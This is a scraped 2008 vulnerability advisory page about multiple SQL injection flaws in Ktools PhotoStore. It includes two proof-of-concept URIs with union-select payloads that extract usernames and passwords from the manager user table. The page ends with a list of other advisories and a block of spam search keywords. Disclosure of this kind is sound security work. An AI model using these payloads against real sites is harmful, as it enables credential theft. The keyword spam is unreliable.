exploits , vulnerabilities , articles , Ktools PhotoStore Multiple SQL Injection Vulnerabilities

Title	Ktools PhotoStore Multiple SQL Injection Vulnerabilities
Published	2008-05-10-12:00AM
Updated	2008-05-10-12:00AM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	DNX
Vulnerable	ktools PhotoStore 3.5.2 ktools PhotoStore 3.5.1 ktools PhotoStore 3.5 ktools PhotoStore 3.4.3 ktools PhotoStore 3.4.2 ktools PhotoStore 3.4 ktools PhotoStore 3.2.1 ktools PhotoStore 3.2 ktools PhotoStore 3.1.1 ktools PhotoStore 3.1 ktools PhotoStore 2.9.8 ktools PhotoStore 2.5
Not Vulnerable
Code	Attackers can use a browser to exploit these issues.The following proof-of-concept URIs are available:http://www.example.com/photostore/about_us.php?gid=0'%20union%20select%201,concat(username,0x2f,password),3%20from%20mgr_users%20/* http://www.example.com/photostore/manager/image_details_editor.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,username,11,12,13,password,15,16%20FROM%20mgr_users
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability
2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 10:47:48 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Proxy www.liveja Last.FM rs gallery m...me/idf www.517d.c www.cheap- curse of t ajit kmail getad download m IceWarp We trisha wal php3 BoF maxcpm.inf m...2Falat mmoney.blo imayg Indian se components bluefilms. php4 base6 news for c m...2Falat bipasha ba Crack Data news for c www.meiriw sex.clb Pompey t319t crack amik flv player www.hs128. Exploit+xo indian gir Ceca porn diner dash pornoto s news for c www.fzaola Crack Data includes/o php-nuke 2 php-...at_ Www.Picthe php-nuke 2 maxcpm.inf www.xxxsex